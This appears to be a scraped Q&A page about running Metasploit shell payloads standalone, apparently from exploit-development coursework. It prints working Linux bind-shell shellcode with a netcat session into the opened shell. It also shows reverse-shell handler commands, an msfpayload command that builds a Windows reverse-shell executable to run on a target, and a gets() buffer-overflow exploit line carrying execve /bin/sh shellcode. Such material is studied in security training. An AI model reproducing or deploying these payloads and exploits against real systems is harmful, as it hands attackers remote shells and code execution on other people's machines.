How to run the linux/x86/shell_bind_tcp payload stand alone?
Generate shellcode, compile and run:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependSetresgid=false,
* PrependSetregid=false, PrependSetgid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now, in terminal 2. Check for connections and finally connect using netcat
. Note, that the $
doesn't appear but the shell is still there:
max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 3326/shellcode
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max 591 Jan 2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max 591 Jan 2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max 471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max 471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max 442 Jan 2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max 442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max 139 Dec 27 08:18 compile.sh
How to run the linux/x86/shell_reverse_tcp payload stand alone?
It's a reverse_shell, it needs something to connect to.
You have to configure and create a reverse_handler, something like this:
# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E
Standalone multi/handler reverse_tcp
I don't really know what your constraints/restrictions are.
My guess is that, you want to "receive shells" on a computer without metasploit installed on it.
If that's the case, you could use msfd(metasploit daemon installed on a different computer) or simply netcat,socat,...
What do you think of this:
- listening with netcat on 192.168.1.2
# nc -l -p 4444
- Using a shell_reverse_tcp instead
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
- Execute darkbird.exe on the target
execute run -jz once for multiple connections
Found the solution: execute "set ExitOnSession false" before "run -jz". that's what I need.
Exploit Development - GETS and Shellcode
When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.
The solution is to close stdin descriptor, reopen /dev/tty before executing /bin/sh.
#include <unistd.h>
#include <stdio.h>
#include <sys/fcntl.h>
int main(void) {
char buf[50];
gets(buf);
printf("Yo %s\n", buf);
close(0);
open("/dev/tty", O_RDWR | O_NOCTTY);
execve ("/bin/sh", NULL, NULL);
}
Related answer: execve("/bin/sh", 0, 0); in a pipe
It is also possible to execute the payload by using
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln
Related Topics
Selinux Prevented Httpd(Usr/Sbin/Httpd) Write Access to /Var/Www/HTML/Bookings/Templates_C
Passwd in One Command Isn't Working
Is There Any Way for Ioctl() in Linux to Specify Submission Queue Id for a Nvme Io Request
Get Mac-Address of Host from Within Docker Container
How to Print Multiple Variables Using Printf
Nagios Plugin to Check Files Are Created Within X Minutes
Why Does 'Change_Protection' Hog CPU While Loading a Large Amount of Data into Ram
Compiling Kernel Error: Stdio.H: No Such File or Directory
Host Multiple ASP.NET Core Web Application Under a Single Linux Server
How to Use Named Mutex at Linux
Simpler Way to Repeatedly Read Lines and Invoke a Program